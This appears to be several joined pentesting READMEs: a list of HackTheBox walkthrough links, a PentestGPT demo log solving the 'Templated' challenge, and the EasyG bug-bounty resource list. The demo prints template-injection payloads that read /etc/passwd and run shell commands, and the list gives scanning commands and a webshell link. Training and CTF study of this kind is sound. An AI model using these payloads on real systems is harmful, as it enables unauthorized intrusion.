[Mango](https://www.hackingarticles.in/mango-hackthebox-walkthrough/)| Linux | Medium | | 103. | [Servmon](https://www.hackingarticles.in/servmon-hackthebox-walkthrough/)| Windows | Easy | | 104. | [Bastard](https://www.hackingarticles.in/bastard-hackthebox-walkthrough/)| Windows | Medium | | 105. | [Cascade](https://www.hackingarticles.in/cascade-hackthebox-walkthrough/)| Windows | Medium | | 106. | [Traverxec](https://www.hackingarticles.in/traverxec-hackthebox-walkthrough/)| Linux | Easy | | 107. | [Forest](https://www.hackingarticles.in/forest-hackthebox-walkthrough/)| Windows | Easy | | 108. | [Admirer](https://www.hackingarticles.in/admirer-hackthebox-walkthrough/)| Linux | Easy | | 109. | [Blunder](https://www.hackingarticles.in/blunder-hackthebox-walkthrough/)| Linux | Easy | | 110. | [SwagShop](https://www.hackingarticles.in/swagshop-hackthebox-walkthrough/)| Linux | Easy | | 111. | [Doctor](https://www.hackingarticles.in/doctor-hackthebox-walkthrough/)| Linux | Easy | | 112. | [Fuse](https://www.hackingarticles.in/fuse-hackthebox-walkthrough/)| Windows | Medium | | 113. | [LaCasaDePapel](https://www.hackingarticles.in/lacasadepapel-hackthebox-walkthrough/)| Linux | Easy | | 114. | [Magic](https://www.hackingarticles.in/magic-hackthebox-walkthrough/)| Linux | Medium | | 115. | [Traceback](https://www.hackingarticles.in/traceback-hackthebox-walkthrough/)| Linux | Easy | | 116. | [Remote](https://www.hackingarticles.in/remote-hackthebox-walkthrough/)| Windows | Easy | | 117. | [Book](https://www.hackingarticles.in/book-hackthebox-walkthrough/)| Linux | Medium | | 118. | [Cache](https://www.hackingarticles.in/cache-hackthebox-walkthrough/)| Linux | Medium | | 119. | [OpenKeyS](https://www.hackingarticles.in/openkeys-hackthebox-walkthrough/)| OpenBSD | Medium | | 120. | [Chaos](https://www.hackingarticles.in/chaos-hackthebox-walkthrough/)| Linux | Medium | | 121. | [Querier](https://www.hackingarticles.in/querier-hackthebox-walkthrough/)| Windows | Medium | | 122. | [Sniper](https://www.hackingarticles.in/sniper-hackthebox-walkthrough/)| Windows | Medium | | 123. | [Resolute](https://www.hackingarticles.in/resolute-hackthebox-walkthrough/)| Windows | Medium | | 124. | [SneakyMailer](https://www.hackingarticles.in/sneakymailer-hackthebox-walkthrough/)| Linux | Medium | | 125. | [Nest](https://www.hackingarticles.in/nest-hackthebox-walkthrough/)| Windows | Easy | | 126. | [Jewel](https://www.hackingarticles.in/jewel-hackthebox-walkthrough/)| Linux | Medium | | 127. | [Academy](https://www.hackingarticles.in/academy-hackthebox-walkthrough/)| Linux | Medium | | 128. | [Passage](https://www.hackingarticles.in/passage-hackthebox-walkthrough/)| Linux | Medium | | 129. | [Worker](https://www.hackingarticles.in/worker-hackthebox-walkthrough/)| Windows | Medium | | 130. | [Delivery](https://www.hackingarticles.in/delivery-hackthebox-walkthrough/)| Linux | Medium | | 131. | [Time](https://www.hackingarticles.in/time-hackthebox-walkthrough/)| Linux | Medium | | 132. | [Ready](https://www.hackingarticles.in/ready-hackthebox-walkthrough/)| Linux | Medium | | 133. | [Laboratory](https://www.hackingarticles.in/laboratory-hackthebox-walkthrough/)| Linux | Easy | | 134. | [Luanne](https://www.hackingarticles.in/luanne-hackthebox-walkthrough/)| OpenBSD | Easy | | 135. | [Scriptkiddie](https://www.hackingarticles.in/scriptkiddie-hackthebox-walkthrough/)| Linux | Easy | | 136. | [Knife](https://www.hackingarticles.in/knife-hackthebox-walkthrough/)| Linux | Easy | | 137. | [Spectra](https://www.hackingarticles.in/spectra-hackthebox-walkthrough/)| Linux | Easy | | 138. | [Love](https://www.hackingarticles.in/love-hackthebox-walkthrough/)| Windows | Easy | | 139. | [Cap](https://www.hackingarticles.in/cap-hackthebox-walkthrough/)| Linux | Easy | | 140. | [Armageddon](https://www.hackingarticles.in/armageddon-hackthebox-walkthrough/)| Linux | Medium | | 141. | [TheNotebook](https://www.hackingarticles.in/thenotebook-hackthebox-walkthrough/)| Linux | Medium | | 142. | [Explore](https://www.hackingarticles.in/explore-hackthebox-walkthrough/)| Linux | Easy | | 143. | [Seal](https://www.hackingarticles.in/seal-hackthebox-walkthrough/)| Linux | Medium | | 144. | [BountyHunter](https://www.hackingarticles.in/bounty-hunter-hackthebox-walkthrough/)| Linux | Medium | | 145. | [PIT](https://www.hackingarticles.in/pit-hackthebox-walkthrough/)| Linux | Medium | | 146. | [Toolbox](https://www.hackingarticles.in/hackthebox-toolbox-walkthrough/)| Linux | Medium | | 147. | [Previse](https://www.hackingarticles.in/previse-hackthebox-walkthrough/)| Linux | Easy | | 148. | [Writer](https://www.hackingarticles.in/writer-hackthebox-walkthrough/)| Linux | Medium | | 149. | [Intelligence](https://www.hackingarticles.in/intelligence-hackthebox-walkthrough/)| Linux | Medium | | 150. | [Forge](https://www.hackingarticles.in/forge-hackthebox-walkthrough/)| Linux | Medium | | 151. | [Anubis](https://www.hackingarticles.in/anubis-hackthebox-walkthrough/)| Linux | Insane | | 152. | [Horizontall](https://www.hackingarticles.in/horizontall-hackthebox-walkthrough/)| Linux | Easy | | 153. | [Return](https://www.hackingarticles.in/return-hackthebox-walkthrough/)| Windows | Easy |
# Resources This directory contains resources for the project. 1. `pentest_records` contains studies on penetration testing with ChatGPT over sample machines (VulnHub, HackTheBox, etc.). 2. `example_chat_history` contains the penetration testing records, mostly manual communication between pentester and ChatGPT. 3. `HTB_logs` contains the testing logs on HTB machine. # Demo Below we show a demo conversation of how **PentestGPT** solves HTB challenge **Templated** (a walkthrough is [here](https://shakuganz.com/2021/06/13/hackthebox-templated-write-up/)) ~~~text 2023-04-23 21:24:26 [user]: I want to test a HTB challenge machine. It is a web challenge, and the target is 139.59.189.117:31877 2023-04-23 21:25:57 [user]: next 2023-04-23 21:26:07 [user]: Source: tool I performed nmap, and seems like only port 80 is open 2023-04-23 21:26:31 [pentestGPT]: Based on the analysis, the following tasks are recommended:Based on the provided summary, I've analyzed the current situation and updated the to-do list: 1. Reconnaissance 1.1. Nmap scan (Completed) 1.2. Identify web technologies 2. Web Testing 2.1. Nikto 2.2. Gobuster 3. Vulnerability Analysis 3.1. Manual analysis 3.2. Automated tools 4. Exploitation 4.1. Web vulnerabilities 4.2. Remote Code Execution -------- Next task: Perform a Nikto scan on the target IP (139.59.189.117) and port 80 to identify potential vulnerabilities and misconfigurations in the web server. ---------------------------------------- 2023-04-23 21:28:20 [user]: next 2023-04-23 21:28:40 [user]: Source: tool Nikto shows that the target server is running Python Flask. Other than that, it shows nothing interesting 2023-04-23 21:29:06 [pentestGPT]: Based on the analysis, the following tasks are recommended:Based on the provided summary, I've analyzed the current situation and updated the to-do list: 1. Reconnaissance 1.1. Nmap scan (Completed) 1.2. Identify web technologies (Completed) 2. Web Testing 2.1. Nikto (Completed) 2.2. Gobuster 2.3. Flask-specific tests 3. Vulnerability Analysis 3.1. Manual analysis 3.2. Automated tools 4. Exploitation 4.1. Web vulnerabilities 4.2. Remote Code Execution -------- Next task: Use Gobuster to perform a directory and file enumeration on the target IP (139.59.189.117) and port 80, searching for hidden endpoints or directories that might expose vulnerabilities. ---------------------------------------- 2023-04-23 21:31:48 [user]: next 2023-04-23 21:33:05 [user]: Source: tool Whatever the directory I keyed in, the response will alwayse be the same, but with a different content like this: ``` <h1>Error 404</h1> <p>The page '<str><directory></str>' could not be found</p> ``` where <directory> is the directory I keyed in for directory enumeration. 2023-04-23 21:33:31 [pentestGPT]: Based on the analysis, the following tasks are recommended:Based on the provided summary, I've analyzed the current situation and updated the to-do list: 1. Reconnaissance 1.1. Nmap scan (Completed) 1.2. Identify web technologies (Completed) 2. Web Testing 2.1. Nikto (Completed) 2.2. Gobuster (Completed) 2.3. Flask-specific tests 3. Vulnerability Analysis 3.1. Manual analysis 3.1.1. Analyze 404 error message behavior 3.2. Automated tools 4. Exploitation 4.1. Web vulnerabilities 4.2. Remote Code Execution -------- Next task: Manually analyze the 404 error message behavior by attempting to access non-existent directories with different names and observing if the response remains consistent. This will help determine if the target system is configured to prevent directory enumeration attacks. ---------------------------------------- 2023-04-23 21:34:32 [user]: next 2023-04-23 21:34:57 [user]: Source: tool The response remain constant. For instance, if I access 139.59.189.117:31877/abc, the response is: <h1>Error 404</h1> <p>The page '<str>abc</str>' could not be found</p> 2023-04-23 21:35:27 [pentestGPT]: Based on the analysis, the following tasks are recommended:Based on the provided summary, I've analyzed the current situation and updated the to-do list: 1. Reconnaissance 1.1. Nmap scan (Completed) 1.2. Identify web technologies (Completed) 2. Web Testing 2.1. Nikto (Completed) 2.2. Gobuster (Completed) 2.3. Flask-specific tests 2.4. Investigate 404 error message behavior (Completed) 3. Vulnerability Analysis 3.1. Manual analysis 3.2. Automated tools 4. Exploitation 4.1. Web vulnerabilities 4.2. Remote Code Execution -------- Next task: Conduct Flask-specific tests by looking for common vulnerabilities associated with Flask web applications, such as misconfigured routes, template injection, and insecure deserialization. Use tools like Burp Suite to intercept and modify HTTP requests if needed. ---------------------------------------- 2023-04-23 21:37:24 [user]: more 2023-04-23 21:37:24 [user]: more 2023-04-23 21:37:27 [pentestGPT]: Sure! Here are some steps a junior penetration tester can follow to conduct Flask-specific tests: Step 1: Identify the web application framework being used by reviewing the Nmap scan results or analyzing the HTTP response headers. Step 2: Use a tool like Burp Suite to intercept and modify HTTP requests to the web application, in order to test for vulnerabilities like misconfigured routes, template injection, and insecure deserialization. Step 3: Test for misconfigured routes by trying to access different URLs or endpoints that should not be accessible. For example, try accessing URLs like `/admin`, `/debug`, `/secret`, or `/test`. Step 4: Test for template injection vulnerabilities by inserting malicious code into the input fields or URL parameters of the web application. You can use payloads like `{{7*'7'}}` or `{{config}}` to test for vulnerabilities. Step 5: Test for insecure deserialization vulnerabilities by sending malicious payloads in serialized form. You can use a tool like ysoserial to generate payloads that exploit various deserialization vulnerabilities. Step 6: Document all of your findings and report them to the relevant parties, along with recommendations for how to address any vulnerabilities or weaknesses you identify. Remember to always prioritize safety and respect the boundaries set by the owner or administrator of the target system or network. ---------------------------------------- 2023-04-23 21:40:36 [user]: next 2023-04-23 21:51:05 [user]: Source: tool I think I found a template injection vulenrability here. When I input view-source:http://139.59.189.117:31877/%7B%7B7*'7'%7D%7D, the web page executes the 7*'7', and it is like this: ``` <h1>Error 404</h1> <p>The page '<str>7777777</str>' could not be found</p> ``` How should I exploit it? 2023-04-23 21:51:38 [pentestGPT]: Based on the analysis, the following tasks are recommended:Based on the provided summary, I've analyzed the current situation and updated the to-do list: 1. Reconnaissance 1.1. Nmap scan (Completed) 1.2. Identify web technologies (Completed) 2. Web Testing 2.1. Nikto (Completed) 2.2. Gobuster (Completed) 2.3. Flask-specific tests (Completed) 2.4. Investigate 404 error message behavior (Completed) 3. Vulnerability Analysis 3.1. Manual analysis 3.2. Automated tools 4. Exploitation 4.1. Web vulnerabilities 4.1.1. Exploit template injection 4.2. Remote Code Execution -------- Next task: Attempt to exploit the template injection vulnerability by injecting Python code to perform reconnaissance, such as reading sensitive files (e.g., configuration files, source code) or listing directories on the server. Use tools like Burp Suite to intercept and modify HTTP requests if needed. ---------------------------------------- 2023-04-23 21:51:42 [user]: more 2023-04-23 21:51:42 [user]: more 2023-04-23 21:51:46 [pentestGPT]: Sure! Here are some steps a junior penetration tester can follow to attempt to exploit the template injection vulnerability and perform reconnaissance: Step 1: Use Burp Suite or another intercepting proxy tool to capture and modify HTTP requests to the vulnerable endpoint. Step 2: Identify the location of the injection point in the HTTP request, such as a URL parameter or form input field. Step 3: Inject a payload that will execute Python code to perform reconnaissance, such as reading sensitive files or listing directories on the server. A sample payload might look like this: ``` {{''.__class__.mro()[1].__subclasses__()[71]('/etc/passwd').read()}} ``` This payload uses the `__subclasses__` method of the `str` class to access the `file` class, which can be used to read files on the server. Replace `'/etc/passwd'` with the path to the file you want to read. Step 4: Submit the modified HTTP request and check the response for the output of the executed Python code. Step 5: Document all of your findings and report them to the relevant parties, along with recommendations for how to address any vulnerabilities or weaknesses you identify. Remember to always prioritize safety and respect the boundaries set by the owner or administrator of the target system or network. ---------------------------------------- 2023-04-23 21:53:16 [user]: next 2023-04-23 21:54:12 [user]: Source: tool I used the payload `{{''.__class__.mro()[1].__subclasses__()[71]('/etc/passwd').read()}}`. However, the page is different from previous result. It shows ``` Not Found The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. ``` I doubt that I use the wrong payload. Can you further explain how to generate a valid template injection payload? 2023-04-23 21:54:48 [pentestGPT]: Based on the analysis, the following tasks are recommended:Based on the provided summary, I've analyzed the current situation and updated the to-do list: 1. Reconnaissance 1.1. Nmap scan (Completed) 1.2. Identify web technologies (Completed) 2. Web Testing 2.1. Nikto (Completed) 2.2. Gobuster (Completed) 2.3. Flask-specific tests (Completed) 2.4. Investigate 404 error message behavior (Completed) 3. Vulnerability Analysis 3.1. Manual analysis 3.2. Automated tools 4. Exploitation 4.1. Web vulnerabilities 4.1.1. Exploit template injection 4.1.1.1. Craft a valid template injection payload 4.2. Remote Code Execution -------- Next task: Research and craft a new template injection payload that might work on the target system. Use various techniques to bypass potential filtering or security mechanisms that might be in place. Once the new payload is ready, attempt the template injection attack again. ---------------------------------------- 2023-04-23 21:55:22 [user]: more 2023-04-23 21:55:22 [user]: more 2023-04-23 21:55:26 [pentestGPT]: Sure! Here are some steps a junior penetration tester can follow to research and craft a new template injection payload: Step 1: Review the findings from previous reconnaissance and vulnerability analysis to identify potential targets for the new template injection payload. This might include configuration files, source code, or other sensitive data. Step 2: Research common techniques for bypassing template injection filters or security mechanisms. For example, you might try encoding the payload, using different syntax or delimiters, or combining multiple payloads to achieve the desired result. Step 3: Craft a new template injection payload that targets the identified vulnerability and uses the selected technique for bypassing filters or security mechanisms. Step 4: Test the new payload using a tool like Burp Suite or manually by submitting the modified HTTP request and checking the response for the output of the executed Python code. Step 5: If the new payload is successful, document the findings and report them to the relevant parties, along with recommendations for how to address the vulnerability. If not, repeat steps 2-4 with different techniques or targets until a successful payload is found. Remember to always prioritize safety and respect the boundaries set by the owner or administrator of the target system or network. ---------------------------------------- 2023-04-23 21:55:43 [user]: next 2023-04-23 21:57:10 [user]: Source: user-comments I did some further research, and the valid payload that bypasses the template injection looks like this: ``` {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} ``` I now need to capture the flag. What should I do? 2023-04-23 21:57:51 [pentestGPT]: Based on the analysis, the following tasks are recommended:Based on the provided summary, I've analyzed the current situation and updated the to-do list: 1. Reconnaissance 1.1. Nmap scan (Completed) 1.2. Identify web technologies (Completed) 2. Web Testing 2.1. Nikto (Completed) 2.2. Gobuster (Completed) 2.3. Flask-specific tests (Completed) 2.4. Investigate 404 error message behavior (Completed) 3. Vulnerability Analysis 3.1. Manual analysis 3.2. Automated tools 4. Exploitation 4.1. Web vulnerabilities 4.1.1. Exploit template injection (Completed) 4.2. Remote Code Execution 5. Capture the Flag 5.1. Identify the flag file or location 5.2. Use the template injection vulnerability to read the flag -------- Next task: Identify the flag file or location on the target system. It's often stored in a file called "flag.txt" or similar. Once identified, use the template injection vulnerability with an adapted payload to read the content of the flag file. Note that the exploitation should be performed only if it's authorized and part of the educational challenge. ---------------------------------------- 2023-04-23 21:57:55 [user]: more 2023-04-23 21:57:55 [user]: more 2023-04-23 21:57:59 [pentestGPT]: Sure! Here are some steps a junior penetration tester can follow to identify the flag file or location on the target system and use the template injection vulnerability to read its content: Step 1: Review the findings from previous reconnaissance and vulnerability analysis to identify potential targets for the flag file or location. This might include configuration files, source code, or other sensitive data. Step 2: Use the template injection vulnerability to execute Python code that will read the content of the flag file. A sample payload might look like this: ``` {{''.__class__.mro()[1].__subclasses__()[71]('path/to/flag/file').read()}} ``` Replace `path/to/flag/file` with the actual path to the flag file or location on the target system. Step 3: Submit the modified HTTP request and check the response for the output of the executed Python code. The response should contain the content of the flag file. Step 4: Document the findings and report them to the relevant parties, along with any recommendations for addressing the vulnerability or improving the security of the target system. Remember to always prioritize safety and respect the boundaries set by the owner or administrator of the target system or network, and only perform the exploitation if it's authorized and part of the educational challenge. ---------------------------------------- 2023-04-23 21:58:16 [user]: discuss 2023-04-23 21:58:16 [pentestGPT]: Please share your thoughts/questions with PentestGPT. ---------------------------------------- 2023-04-23 21:58:21 [user]: Thanks. I get the flag:D 2023-04-23 21:58:42 [pentestGPT]: Congratulations on successfully capturing the flag in this educational challenge! I hope that the experience provided valuable learning and insight into penetration testing techniques and methodologies. Based on your achievement, I've updated the to-do list: 1. Reconnaissance (Completed) 2. Web Testing (Completed) 3. Vulnerability Analysis (Completed) 4. Exploitation (Completed) 5. Capture the Flag (Completed) -------- As you have completed the challenge, there are no further tasks for this specific scenario. However, you can continue to develop your penetration testing skills by participating in additional educational challenges, attending workshops, and staying up-to-date with the latest security research and best practices. Always remember to engage in ethical hacking and ensure you have proper authorization when testing systems. Good luck in your future endeavors! ---------------------------------------- 2023-04-23 21:58:47 [user]: quit 2023-04-23 21:58:47 [pentestGPT]: Thank you for using PentestGPT! ---------------------------------------- ~~~
# EasyG EasyG started out as a script that I use to automate some information gathering tasks for PenTesting and Bug Hunting, [you can find it here](https://github.com/seeu-inspace/easyg/blob/main/easyg.rb). Now it's more than that. Here I gather all the resources about PenTesting and Bug Bounty Hunting that I find interesting: notes, payloads that I found useful and many links to blogs and articles. ### Index - [Blog / Writeups / News & more](#blog--writeups--news--more) - [Safety tips](#safety-tips) - [Check-lists](#check-lists) - [Tools](#tools) - [Burp Suite](#burp-suite) - [Content Discovery](#content-discovery) - [Bash](#bash) - [XSS](#xss) - [SQLi](#sqli) - [SSRF](#ssrf) - [Authentication vulnerabilities](#authentication-vulnerabilities) - [Access control vulnerabilities and privilege escalation](#access-control-vulnerabilities-and-privilege-escalation) - [Directory Traversal](#directory-traversal) - [Business logic vulnerabilities](#business-logic-vulnerabilities) - [CORS](#cors) - [Deserialization](#deserialization) - [HTTP Host header attacks](#http-host-header-attacks) - [DLL Hijacking](#dll-hijacking) - [Abusing S3 Bucket Permissions](#abusing-s3-bucket-permissions) - [GraphQL](#graphql) - [WordPress](#wordpress) - [IIS - Internet Information Services](#iis---internet-information-services) - [Lotus Domino](#lotus-domino) - [Network](#network) - [Linux](#linux) <hr/> ### Blog / Writeups / News & more - https://portswigger.net/research - https://www.skeletonscribe.net - https://cvetrends.com/ - https://wiki.owasp.org/index.php/Testing_Checklist - https://packetstormsecurity.com/ - https://twitter.com/hashtag/bugbountytips - https://securib.ee/ - https://samcurry.net/ - https://samcurry.net/hacking-apple/ - https://blog.intigriti.com/hackademy/xss-challenges/ - https://hackerone.com/hacktivity - https://pentester.land/list-of-bug-bounty-writeups.html - https://github.com/juliocesarfort/public-pentesting-reports - https://pentestreports.com/ - https://pentestbook.six2dez.com/ - https://xcellerator.github.io/ - https://persistence-info.github.io/ <hr/> ### Safety tips - For RCE - Never upload a shell at first, you can be banned from a program. Just execute a `whoami` as a PoC, proceed with a shell if required/allowed. - For stored XSS - `console.log()` is better than `alert()`, it makes less noise especially for stored XSS. - For SQLi - Don't dump the entire db, you can be banned from a program. Just retrieve the db's name, version and/or other minor infos. Proceed with db dump only if required/allowed; - Don't use tautologies like `OR 1=1`, it can end up in a delete query or something dangerous. It's better to use `AND SLEEP(5)` or `te'+'st`. - For subdomain takeovers - use as a PoC an html page like:<br/> 9a69e2677c39cdae365b49beeac8e059.html ```HTML <!-- PoC by seeu --> ``` <hr/> ### Check-lists - [Mobile Application Penetration Testing Cheat Sheet](https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet) - [SMB-Checklist](https://github.com/pentesterzone/pentest-checklists/blob/master/Services/SMB-Checklist.md) - [WordPress Checklist](https://github.com/pentesterzone/pentest-checklists/blob/master/CMS/WordPress-Checklist.md) - [Win32 Offensive Cheatsheet](https://github.com/matthieu-hackwitharts/Win32_Offensive_Cheatsheet) - [Regexp Security Cheatsheet](https://github.com/attackercan/regexp-security-cheatsheet) #### Testing layers - [ ] Integrations - [ ] Application Libraries (usually JavaScript) - [ ] Application: Custom Code or COTS - [ ] Application Framework - [ ] Web Hosting Software (Default creds, Web server misconfigurations, web exploits) - [ ] Open Ports and Services (Default creds on services, service level exploits) #### Bug bounty Multiple targets - [ ] Run EasyG assetenum + take screenshots - [ ] Select the interesting targets Single target - [ ] Test register - [ ] Test login: 2FA, Password reset, Open Redirect - [ ] [Upload Functions](#upload-functions-check-list) - [ ] Broken Access Control, IDOR & co - [IDOR Checklist](https://twitter.com/hunter0x7/status/1580211248037126145) - [ ] [OWASP Web Application Penetration Checklist v1.1](https://owasp.org/www-project-web-security-testing-guide/assets/archive/OWASP_Web_Application_Penetration_Checklist_v1_1.pdf) - [ ] Content Types - Look for multipart-forms - Look for content type XML - Look for content type json - [ ] APIs - Methods - [ ] Account Section - Profile - Stored XSS - App Custom Fields - Integrations - SSRF, XSS - [ ] Errors #### Upload Functions check-list - [ ] Integrations (from 3rd party) - XSS - [ ] Self Uploads - XML based (Docs/PDF) - SSRF, XSS - Image - XSS, Shell - Name - Binary header - Metadata - [ ] Where is data stored? - [s3 perms](#abusing-s3-bucket-permissions) <hr/> ### Tools - To have multiple email adresses using gmail, you can add a `+` sign after your email's alias. For example: if your email is `[email protected]` and you sign up for Twitter you can sign up using `[email protected]`. [[Reference](https://twitter.com/_thegameoflife_/status/1564642697482231813)] **For a temporary public server** - [XAMPP](https://www.apachefriends.org/) + [ngrok](https://ngrok.com/) - [beeceptor](https://beeceptor.com/) **For auths** - [textverified.com](https://www.textverified.com/) for auths requiring a phone number - [temp-mail.org](https://temp-mail.org/en/) **For .git exposed** - [DotGit](https://github.com/davtur19/DotGit) find if a website has `.git` exposed - nuclei template `%USERPROFILE%\nuclei-templates\exposures\configs\git-config.yaml` - [GitDumper from GitTools](https://github.com/internetwache/GitTools) **To find parameters** - [Arjun](https://github.com/s0md3v/Arjun) detection of the parameters present in the application - [ParamSpider](https://github.com/devanshbatham/ParamSpider) **Asset enumeration/discovery** - [shuffledns](https://github.com/projectdiscovery/shuffledns) - [BurpSuite Extension - Asset Discover](https://github.com/PortSwigger/asset-discovery) - [nmap](https://nmap.org/) - `nmap -p 1-65535 -sV -T4 -Pn -n -vv -iL target.txt -oX out.xml` - [bgp.he.net](https://bgp.he.net/) to find ASN + `amass intel -asn <ASN>` - [crt.sh](https://crt.sh/) - ` cat json.txt | jq -r '.[].common_name' | sed 's/\*//g' | sort -u | rev | cut -d "." -f 1,2 | rev | sort -u | tee out.txt` - [naabu](https://github.com/projectdiscovery/naabu) - `naabu -l 1.txt -v -p - -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -c 1000 -rate 7000 -stats -o 1_o.txt` **For JavaScript Analysis** - [beautifier.io](https://beautifier.io/) - [xnLinkFinder](https://github.com/xnl-h4ck3r/xnLinkFinder) - [BurpJSLinkFinder](https://github.com/InitRoot/BurpJSLinkFinder) **For takeovers** - [Can I take over XYZ?](https://github.com/EdOverflow/can-i-take-over-xyz) - nuclei template `%USERPROFILE%\nuclei-templates\takeovers` **To find vulnerabilities** - [Tplmap](https://github.com/epinna/tplmap) for SSTI exploitation - [CSRF PoC Generator](https://security.love/CSRF-PoC-Genorator/) - [BruteSpray](https://github.com/x90skysn3k/brutespray) `python brutespray.py --file nmap.xml --threads 5 --hosts 5` - [cmd.aspx](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx) - [SearchSploit](https://github.com/offensive-security/exploitdb#searchsploit) Port services vulnerability checks - [nuclei](https://github.com/projectdiscovery/nuclei) - Check for Exposed panels `%USERPROFILE%\nuclei-templates\exposed-panels` - Check for Technologies `%USERPROFILE%\nuclei-templates\technologies` - Check for more `-t %USERPROFILE%\nuclei-templates\misconfiguration -t %USERPROFILE%\nuclei-templates\cves -t %USERPROFILE%\nuclei-templates\cnvd` - [nuclei geeknik](https://github.com/geeknik/the-nuclei-templates) - [CMSeeK](https://github.com/Tuhinshubhra/CMSeeK) CMD Detection & Exploitation Suite - [ppfuzz](https://github.com/dwisiswant0/ppfuzz) a fast tool to scan client-side prototype pollution vulnerability **Decompilers** - [VB Decompiler](https://www.vb-decompiler.org/products.htm) decompile a VB application - [Sigcheck](https://docs.microsoft.com/en-us/sysinternals/downloads/sigcheck) check the signature of an executable - [ILSpy](https://github.com/icsharpcode/ILSpy) | [dnSpy](https://github.com/dnSpy/dnSpy) .NET decompilers - [Java Decompiler](https://java-decompiler.github.io/) - [dex2jar](https://github.com/pxb1988/dex2jar) decompile an .apk into .jar - [jadx-gui](https://github.com/skylot/jadx/releases) another tool for producing Java source code from Android Dex and Apk files - [apktool](https://ibotpeaches.github.io/Apktool/) to unpack an apk **Desktop Application / Thick Client Penetration Testing** - [testssl.sh](https://testssl.sh/) useful for checking outdated ciphers & co. - [Process Hacker](https://processhacker.sourceforge.io/) It helps to dump the exe memory and see what sensitive data is there - [Echo Mirage](https://resources.infosecinstitute.com/topic/echo-mirage-walkthrough/) to monitor the network interactions of an application - [Wireshark](https://www.wireshark.org/) **Android** - [adb](https://developer.android.com/studio/command-line/adb) it is used to debug an android device - [HTTP Toolkit](https://httptoolkit.tech/) to see requests on a non-rooted or emulated device, as an alternative to burp suite - [Genymotion](https://www.genymotion.com/) an android emulator - [Android Studio](https://developer.android.com/studio) Android application development, useful also for the emulator - Note: to start only the emulator, use commands such as ``` cd C:\Users\Riccardo\AppData\Local\Android\Sdk\emulator emulator -avd Pixel_4_XL_API_30 ``` **For Reports** - [Vulnerability Rating Taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy) - [CVSS Calculator](https://www.first.org/cvss/calculator/3.1) - [PwnDoc](https://github.com/pwndoc/pwndoc) - [Vulnrepo](https://vulnrepo.com/home) - [PlexTrac](https://plextrac.com/) **Other** - [URL Decoder/Encoder](https://meyerweb.com/eric/tools/dencoder/) - [Down or not](https://www.websiteplanet.com/webtools/down-or-not/) - [DigitalOcean](https://www.digitalocean.com/) See [Setting Up Your Ubuntu Box for Pentest and Bug Bounty Automation](https://www.youtube.com/watch?v=YhUiAH5SIqk) - [trashcompactor](https://github.com/michael1026/trashcompactor) to remove URLs with duplicate funcionality based on script resources included - [uro](https://github.com/s0md3v/uro) declutters url lists - [putty](https://www.putty.org/) - [jdam - Structure-aware JSON fuzzing](https://gitlab.com/michenriksen/jdam) - [Impacket](https://github.com/SecureAuthCorp/impacket) - [PCredz](https://github.com/lgandx/PCredz) - [Visual Studio Code](https://code.visualstudio.com/) for Source Code Analysis **Used in [easyg.rb](https://github.com/seeu-inspace/easyg/blob/main/easyg.rb)** - [amass](https://github.com/OWASP/Amass) - [subfinder](https://github.com/projectdiscovery/subfinder) - [github-subdomains](https://github.com/gwen001/github-subdomains) - [gobuster](https://github.com/OJ/gobuster) + [all.txt by jhaddix](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) - [crt.sh](https://crt.sh/) - [httprobe](https://github.com/tomnomnom/httprobe) - `type subs.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -c 150 > out.txt` - [anew](https://github.com/tomnomnom/anew) - [naabu](https://github.com/projectdiscovery/naabu) - `naabu -v -list subs.txt -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -stats -o out.txt` - [gospider](https://github.com/jaeles-project/gospider) - [hakrawler](https://github.com/hakluke/hakrawler) - [Selenium](https://github.com/SeleniumHQ/selenium/wiki/Ruby-Bindings) - [nuclei](https://github.com/projectdiscovery/nuclei) - `nuclei -l httprobe_results.txt -t %USERPROFILE%\nuclei-templates\takeovers -t %USERPROFILE%\nuclei-templates\exposures\configs\git-config.yaml -o out.txt` #### Burp suite To add a domain + subdomains in advanced scopes: `^(.*\.)?test\.com$` Cool extensions: - [Turbo Intruder](https://github.com/PortSwigger/turbo-intruder) - [HTTP Request Smuggler](https://github.com/PortSwigger/http-request-smuggler) - [Wsdler](https://github.com/NetSPI/Wsdler) to interact with SOAP - [BurpCustomizer](https://github.com/CoreyD97/BurpCustomizer) - [Software Version Reporter](https://portswigger.net/bappstore/ae62baff8fa24150991bad5eaf6d4d38) - [Software Vulnerability Scanner](https://portswigger.net/bappstore/c9fb79369b56407792a7104e3c4352fb) - [Content Type Converter](https://portswigger.net/bappstore/db57ecbe2cb7446292a94aa6181c9278) - [Wayback Machine](https://portswigger.net/bappstore/5c7c516c690345c19fbf55b2b2ebeb76) - [TokenJar](https://portswigger.net/bappstore/d9e05bf81c8f4bae8a5b0b01955c5578) - [Site Map Fetcher](https://portswigger.net/bappstore/93bbecc3da434ef7ba5a5b2b98265169) - [PsychoPATH](https://portswigger.net/bappstore/554059e593ce446585574b92344b9675) - [File Upload Traverser](https://portswigger.net/bappstore/5f46fe766e9c435992c610160bb53cba) - [CMS Scanner](https://portswigger.net/bappstore/1bf95d0be40c447b94981f5696b1a18e) - [ParrotNG](https://portswigger.net/bappstore/f99325340a404c67a8de2ce593824e0e) - [Paramalyzer](https://portswigger.net/bappstore/0ac13c45adff4e31a3ca8dc76dd6286c) - [CSurfer](https://portswigger.net/bappstore/086c6af8b24c40a79a5e99b71df10f11) - [J2EEScan](https://portswigger.net/bappstore/7ec6d429fed04cdcb6243d8ba7358880) - [Python Scripter](https://portswigger.net/bappstore/eb563ada801346e6bdb7a7d7c5c52583) - [Add a custom HTTP header in Burp](https://github.com/PortSwigger/add-custom-header) - [Active Scan++](https://portswigger.net/bappstore/3123d5b5f25c4128894d97ea1acc4976) - [Additional Scanner Checks](https://portswigger.net/bappstore/a158fd3fc9394253be3aa0bc4c181d1f) - [Backslash Powered Scanner](https://portswigger.net/bappstore/9cff8c55432a45808432e26dbb2b41d8) - [Additional CSRF Checks](https://portswigger.net/bappstore/2d12070c90cb4a0f91cde0b8927fd606) - 